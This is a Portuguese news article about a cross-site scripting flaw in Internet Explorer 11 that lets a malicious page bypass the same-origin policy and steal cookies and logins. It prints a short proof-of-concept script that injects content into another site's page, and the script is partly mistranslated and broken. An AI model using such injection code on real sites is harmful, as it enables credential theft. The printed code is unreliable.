Falha no Internet Explorer ameaça as credenciais de login dos usuários

internet

Uma vulnerabilidade descoberta no Internet Explorer permite que os atacantes roubem credenciais de login e insiram malwares durante as sessões de navegação. De acordo com funcionários da Microsoft a falha já está sendo corrigida, as versão do navegador que pode ser invadida é a 11, disponível sistemas Windows 7 e Windows 8.1.

A vulnerabilidade é um bug do tipo XSS, também conhecido como cross-site-scripting, que é normalmente encontrada em aplicações voltadas para a Web, injetando um script que permite manipulara página do usuário. Com esse controle o atacante pode aplicar uma derivação na política de mesma origem, que é vital para nos modelos atuais de aplicações na web, para impedir o acesso ou a modificação de cookies no navegador ou qualquer outro conteúdo de qualquer outro site. 

Tendo os cookies do navegador em posso dos hackers, eles podem ter acesso aos locais onde o usuário utilizou suas credenciais de segurança (login e senha), dando ao atacante total liberdade para utilizar esses dados da forma que a mente maligna deles desejarem.

Claro que para o bug ser explorado é preciso que o usuário seja levado a um site malicioso, através de práticas bem conhecidas como o phishing por exemplo. Depois de interceptar o usuário, a página explora o bug via iframes que comprometem a política de mesma origem do Internet Explorer.

O código utilizado para a exploração da falha é parecido com este:

função go () 
{ 

     w = window.frames [0]; 
     w.setTimeout ("alert (eval ('x = top.frames [1]; r = confirm (\\' Close this window after 3 seconds
..\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); 

} 

setTimeout ("ir ()", 1000);

Postado por
Editor-chefe no Hardware.com.br. Aficionado por tecnologias que realmente funcionam. Segue lá no Insta: @plazawilliam Elogios, críticas e sugestões de pauta: william@hardware.com.br
Siga em:
Compartilhe
Deixe seu comentário
Localize algo no site!